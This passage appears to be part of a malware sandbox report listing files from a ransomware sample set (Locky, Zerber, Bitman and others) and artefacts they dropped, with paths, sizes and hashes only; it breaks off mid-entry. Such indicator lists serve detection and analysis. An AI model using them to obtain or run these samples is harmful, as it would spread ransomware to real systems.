                                                                                                                                                                                                  aa163f6a2dcfa1f30d3b45c0e4a7814cc0921c9a09ce771361624601640eed317b92ea182c631dbd0c500d1e48c2a7f73b3be9f7e3b0f4888cd95e503712d52f

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fsfdmfk
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  64KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  fc9ecaa585e4341f90e37fd6b75290f4

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  1e459e588e4164c32a74051aab8a2a244365e30c

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  1725dddb8cc3996b18f5c1fb8d7cda5d4b30a72ba70beaf0fbdd3aa5f1833e24

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  602a6eef7405bf710db255d122fc61d52c455618a1185471381fb192689e307725e75feede1f56d09a914decb63d85e1a9dbba1831e8046d658b2b445c11fd3f

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nstC9A6.tmp\qyyrs.dll
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  120KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  8e205a01e3d4b798e964111f68d7b52c

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  1831a8beefc35d331e60a79836c622b592a9e30a

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  096b485f8e54ae73b6528261fa319bf8aac943616232344d9dd03bedc2e49b85

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  ec684dd8583b0638c782c5457480595368cc3153794b602d1f411eb096a40894bce33a6825ef29d6f91e9d8d9d44f9916b16f978cebdcd7839d0a488b8eabded

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nsuFB41.tmp\System.dll
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  11KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a436db0c473a087eb61ff5c53c34ba27

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  65ea67e424e75f5065132b539c8b2eda88aa0506

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  75ed40311875312617d6711baed0be29fcaee71031ca27a8d308a72b15a51e49

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  908f46a855480af6eacb2fb64de0e60b1e04bbb10b23992e2cf38a4cbebdcd7d3928c4c022d7ad9f7479265a8f426b93eef580afec95570e654c360d62f5e08d

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpBF0D.tmp.bat
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  351B

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  7a523b34790994b9c1b88407b4ecae24

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  886edeeeea4d62b9b15a24ad7f6125a9323a4e84

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  fb79e84e4c5e1b60c758b5d02e30ef6c12896517b65453038860b9758fddacf0

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  0781fe728bacd15f56e43949d888dd72d235123ff1676bc65479c6522e22f051a700cb0b885b8920747797020aa6480b48275a551239df9854a733ed868285b4

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\~DF521D61888AD7F93E.TMP
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  20KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  eaf4a8da1d6321251cfcf1e6604aaaa4

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9b188f928046cc7ca50c27ae5b6358b561d54af2

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  10ae7e1e9358c9b2a2b4452152047a00b90b97cae19353952ebfebe31daa56f5

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  5f5f8940e7d2e49a6dc7bf8cb4c36eb3221d90df142b96ae72af1eb2c696c0d665deea9dfd703fcae5dba5bfe847ffac00b83aa59e65a1f9325f0368f3f99d4c

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\README.hta
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  61KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  512e4062f74698ebca5e95a0fc8fca4d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a2336f70ec5ff0a51c4b1344a8f9d0e51d5122ea

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  25f37e43d78353282810119c76c9acc1e606e46b59f216d6e637d8c4529c367e

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  8f6f57b22827e5021396bac96bb16664b6d1b27e672171e5e0e1457c98b3c4ac7f01b3edee395c72b5fee8ab35e4980028b583852b29cee717f5d7f24ea07b75

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Ceubb\quurb.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  67KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5c50c06844fb6a919640b3890e1c055d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  bf89acd83aa6285bc2a8b9ff85c6fa630f25f8ea

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  554d48a3cd400fad872763f8a1120bb9cf105799efb8ec61656be1e9686f481b

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  4a5bd601b8047bcd7ceed375e7a1f78fa7966a2d946a100cac37a37a8c8510ff986ff540994e0abc47fb90f224ca4b8e9a0d8df86f4f2933a2b66fc0f70b7299

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\agfxdrv.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  11KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  f208134246fc0e084bf3c221a7235b9e

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  7bcd5a68be46d4be56b3b38ffe2edd449793d3f6

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  c5de40c6c14e7a9ac7d20ef48c08d2ff00af6fb886e9387113c68e1ebd98412c

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  6cae05792210f8222e3338e19b0f372e28582e7e3e7dfb3f5f543d4cf137462a09b7f343b4214e84a9eb532058bfea572a8ce1fe01a543834d33504ec01cc2b5

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\gpresult.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  266KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  f0e974f20c4ab0e172f54fac69b82f71

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  a00f5ee4f368f6275458191afd42e2511c07f25f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  515c0fd6f90e7729ea25ac2169e0b37c314e5bf42d1fc9286299582e5aab5989

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a46f31594588612d137a2f79d3a3e66bb2548939b4c2be1d4fa8accf9a152b24b99c1b424918295e2e6736b89abb169b73ca85348284d30ec3e53534ea287185

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\raserver.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  284KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0ae9e6302b7cebfe0846c92a54a8f4ef

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  bf953ae0485d532d3d27260c2080fc431ac2e88d

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  2e3fc5446dd0130540473648d7d3f39fd722ccbdccc3ae571b33e9de76e7dcac

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  675141942ff508d6f355191a699ec52393836b49d6f1520aa96c2efec4125054cd6af926c6e043ae2fd66fadd4e18345e80db19ff7d5ff33fd10c011cee221aa

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Foreign.gen-5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2.7MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d19fd373ec456f082b49558287a0934a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  76627027bf569955b3c95272668f287b9944a565

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  0b8d8e8916632dbb4f8137484da9de250373b551cb3a90c08e59c483ce8105c8fb718d3e09df74db53a0a9496100f0f0790f69bd93e3b26f47377aad01738fdd

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Gen.vho-32e888b1ee437938a96387d4facb6d07038a620fd0c9e90affda40bdf7c13287.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  80KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  e001ddafc18e3290df858a4d1e3572d6

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  b7f796d6e1c45f1fe087bd2bac0192ea7839f790

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  32e888b1ee437938a96387d4facb6d07038a620fd0c9e90affda40bdf7c13287

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  885e3e620e56a274a241f4d9dc7f3092c24552953327bf83e8ae291e269138d1aed7a8216a216dc3691dd0c4423a9d120a02f20fc51c4a09fb7f5ae9e030a8f7

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Generic-cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  189KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  891910524ebe7c34c9ed06673b6859a8

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  7749f4e1be7fa334556701a213eea2b405aec9e1

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  8ba09a4fee96875833515e439cdce22fe17a4319576d6710060d32ef25e7347d603243ceeaa3ff40b27ad839739aeab81cba8305a0e4edd4b511777c87fb7a00

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Locky.vho-5a7d984ca65795cbebee96dcf409d711c7413077ab82e32da4173aa8eb06764d.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  147KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  3202bd8c702636986c9c196eb223b8ed

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  0f53ffc72d40c59691ceb54ecfd5f0bbeda311f9

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  5a7d984ca65795cbebee96dcf409d711c7413077ab82e32da4173aa8eb06764d

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  f4a5914ab67ed8f710ae4062fb0ecbf846da066c4888e9bb37bba0dcf33cb4e16c4502094eeb993cf3879fd76adc29dc0bc07d82b4d480ce546b0b753d3ca368

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Zerber.gen-8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  259KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  3719d28b9cbccd772df7891735263b4e

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  b672b28615429f605f9c233d31dae1ba0b293362

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  b86dcfc32686ff1c0f7974c5a6bdc58a88b7ffb7c6cd231721896425e052476aa7b4b8d853ce098a338b696c837d34d0455b9fa87c790670d08a9dc33238f565

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ird-c8ca74659486e9b5cb1009ea4bd11197732d48270078c2f54ed16c51f99da1fb.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  324KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a0442b059e6dcd1258d6c3011b279884

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  95c5c98c0b6fa2b153576da7f5b1019928882b3b

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  c8ca74659486e9b5cb1009ea4bd11197732d48270078c2f54ed16c51f99da1fb

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  fcdd9f60d60d4c9a69b2a34338cc560a31c34636bb07982302f491e5a36fead7b6db21e15e2ce51349f55db7e5917997bfdd2d899366e0869bcb5e2dc53dc3f1

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ivn-9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  324KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  eeee5f0c8ae3b5fde336008fef578e70

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  49ac653e940e82c73a764d8cb442dc2373982b53

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  1c9c545e998c771ec4516fafd12005fea86ba30dcaa3645ebabfafaa015dd02e55246ed299411f806f7cf93720931d191d505f65f224efea98a7984caa2ad6d9

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.jak-42f907e33f53e196e54e1bce5302c112a2b0c68b45e48cd29e04267dc1ada844.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0075cd364f55626276f7feb6e37cfadd

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  ebd103bcd7b80a775d25a02a403fb35d4c3d3bc4

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  42f907e33f53e196e54e1bce5302c112a2b0c68b45e48cd29e04267dc1ada844

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  42aa2c3ce7652ee571dfa130b7b8e355339ec05309cf36a8a1b94e8205f8924c39273ca37e1bf87e8b5ebf609dea0f00399be2da14e5ce79bb57004d008ae061

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.aeqv-081c32bb75c7939cd0a2d10aed8410082f92a390c26c91ff402d7757001a7f64.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  316KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  02a8c3ade9f25f8efd3a22d56c57fca2

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  28524362558cf1dfe638f12031e0017e5cb65ec6

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  081c32bb75c7939cd0a2d10aed8410082f92a390c26c91ff402d7757001a7f64

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3e4c1723e6fac8ce6e3e8be3c3ba42f94d275feede21926357a436d131167571f1571baa140129f434a860660b2788b9285453cf2ded2f5f719f85ce09eb1b98

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.jyt-c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  372KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1fa63b64e8a612ff6c2c2ee26a11d9fc

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  b303763a8994469fe5a4e296e10d62f5d814a583

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a261d6cc16657ae8a952bbc002cc44ff1e9156865686ad11d4694e079c4271432694a284517ddf6a010b1601657960e15794265fc59c92fa250208ac823c08d7

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.kat-83fcdccb40286c12f489ac23df3920da211e8c582a514d9030e1b0b5cb2fd58d.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  275KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c7f1479c0fdfd62819fe68ce1d2fbf65

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  3dbb71047823c3b861d4da5d0a7143fc2f252380

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  83fcdccb40286c12f489ac23df3920da211e8c582a514d9030e1b0b5cb2fd58d

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  2707b60a815c66a505508f40b1457d78e7b150887bd24225f2bba007d8552c855e17d9bfefd4c437d972e36ebf7287677b13e432e84e112872ad2bcb06cb8a87

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.kjm-eaff47a7b0aad006c0425053d72435de55890ba4dfdfbffe89006dde012ecd36.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  340KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c7feb61d6f0a048b684daa6e5b437ae5

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  452088e47eb4616a9e9a749152d635bf97a107ea

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  eaff47a7b0aad006c0425053d72435de55890ba4dfdfbffe89006dde012ecd36

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  58324e09ee27fd54118998aac56099b5aa3e9d1afd3f91d028cd790f77990d37bbaf9bb963faae88e44b8d2d3d8205d44bc2991f127e0eab2643c8a2e01b6d28

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.lfd-26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  384KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  f0442de332edcc6a918253ed5be9afb3

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  199545affb44900ca1f1752d0606cab55f16bddc

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  26d2442e7257da462083ce764114d14aaf2971deed40bbba13e66c09a10c95e8

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  068a947f47403b98f0cdb5e0e3ed0c5b174a2079d73131b2d214de61f3ee887cf80c3c685b2f785c03f44906d8a8785108490a165ada5fb69cff6793bd518d6b

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.nws-dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  608KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  9857897838be56981c42f3d106b24d5a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  559064e07117b758f8702315d41eb105c5e0376b

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  dc4edeb968c4913db0a632fe01b66ce036d0c3e3c275d7ea61807ca5bb53398d

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3c28a9d86c02daecb866220000141acacb7d019aa521e450b455fd67ce4d16b6ccf8f500e2cd0c315839700ede972df07ae94aa7bee9b1ea42d923ec98299959

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.pyi-b25ba188ff6b80902ddb1428d85ad70156af8b10faec8f7b360f30587d15b1e0.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  334KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  04db24f9c2823885d07700408c7081af

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  519863ba591eef9afce32beefe56f3ca6eb1ab27

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  b25ba188ff6b80902ddb1428d85ad70156af8b10faec8f7b360f30587d15b1e0

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  5ca7a7889c452f6630ac049eebcd54c78522f15f480c46c50fcf191bd39cf36e03fbca5bd7849781d2836fbc15aa7dad8dc2d1122541f1f05dc3403496389d18

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.qkb-a736d43d5f69fb6ab0991011a66acf7d27e9c34adaea35289c42b10cacc09b73.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  484KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1c25f976aeaf9c46de42bf40a055c0be

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  308f5e956abad880540795b3a185e7729a3db717

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a736d43d5f69fb6ab0991011a66acf7d27e9c34adaea35289c42b10cacc09b73

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  2c213c74c4182066637a94edf91b338fa0b6c7b47161e33ce72ab6775f87ca3b9b4196e66dc725b604e8a747047b79640d510e24ed7e7c953a08e10de2d16ca7

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.qrz-d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  312KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a84eb9d84b8a2538163c101438426e70

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  919f18a8de4343f2d0dfd1a05a50ee34c4c91e1e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  d6104e9fc20382ec5bbffe87d660af1bff2cbdc14fcb75b636e7e999b858e6d9

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  1502156b6c06db559e5d9ac6ace07c052f6ec905341fdf25bfa3eef4f44d27f919c98cde6a321e161f2b4cb1031f6da180fa9bd502a36b6c95a12c17e847a20f

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Blocker.keua-bdf2c59796b3d9a4026a940b820c627fcff7cb3909a85d7eeeabf6345931343f.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  513KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c432b3ab8fb973fb8ed603624c589c6d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  c79986ec284c2ab0a78fcbaea10984b5bb000b9f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  bdf2c59796b3d9a4026a940b820c627fcff7cb3909a85d7eeeabf6345931343f

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  d784d6979455aaefdcd63cf82036255ea7d1bb74085b46278cf71247fb25ed60b687b21315e9b1eda0cba8fd3a1d8ac5cab278ccaea2de559fba1d7cf573d9fa

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.flts-ecb383fde6c516ff4f59f0756235136fce26bfc743c8491c8d6dd7c2b48a9bd2.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  86KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  991041663f7bbfdd9611f2092dabc58e

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  ad441100d01d7401d2ac0991cf5499f4b9bb8ba5

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  ecb383fde6c516ff4f59f0756235136fce26bfc743c8491c8d6dd7c2b48a9bd2

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  34cf31742a7460d0bc845d3de908aac0e8f9062028534dba4ef27cb4ed5f3d2b55e654460d6d867970953848a0748578121f835dac724dad6e2928d0494cabfc

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.gthl-50d6f7d5e89d2b6a5510b4d85250dab9c2baa2d6eb99979dc67f1ea791b7291f.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  64KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  8fa0ecb45b7a2ccb02003bb9ef9c9f5f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  88735285c2fc098339c9f0468d887be7d6f6a158

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  50d6f7d5e89d2b6a5510b4d85250dab9c2baa2d6eb99979dc67f1ea791b7291f

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dd8f2a779afe0eb5f03925262f3a0a411a075b7343dd5925af118b16d3ebd864c122ab75c01b1fd5e8bb88785f3dae1ac3f189598bf0fd72220f13a405b77f89

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.jpdw-30d7bf9fa71fda9eef1e658b30fa908ba27f40f7cd13087d64cfb8fefd2d3282.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  547KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  4b3e97ecbe925860d24ba2d5fe6c0345

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  4ec225aab6a8e8cd61299d118f6e317fbded9a3a

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  30d7bf9fa71fda9eef1e658b30fa908ba27f40f7cd13087d64cfb8fefd2d3282

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  a11844cb8d97ce3e5bea4c111bc3ef8832f6d4c92b6711f3b216795603ea08fa204b1f0d489068dbc1f2e22cdbcde1d6e6fdd51dcee58c2236d88995e4b129ac

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Foreign.nnuo-b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  278KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  7e709ef9a4d23348d3496cb9f7fb66a7

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  ad8972e28b113b1082b14beacda997695487581b

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  f004ff8eb367cc3f4abb353016f4cc58600e98bc112df863e0e2f364cf0b12ab1a07f8dd6c569c726c1f63ec0a08eff6b69d520d5a866b4eeeec5280607860a9

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Gen.ezt-72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  268KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  4e2b58f99ad9f13c2b09f0741739775d

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  6a51d0cd9ea189babad031864217ddd3a7ddba84

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dd74f94fbe6324410e832ab22b2807bbc5bc4171704477898a2b64a1ce6a7b3a289a4fb399412152b33a6b286e439c8d89eca4d5cba7bcd65dcb864e18487ebd

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Locky.cs-28046c14ea3325885ee1e731cd0bcf9f38445df02675836b851cb2ae94c050eb.exe
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  102KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  c63a537090d34f29daadbef221637435

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  ba17638bac43e6e3b2faf4bf3a22197b99d8a390

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  28046c14ea3325885ee1e731cd0bcf9f38445df02675836b851cb2ae94c050eb

                                                                                                                                                                                                  SHA512

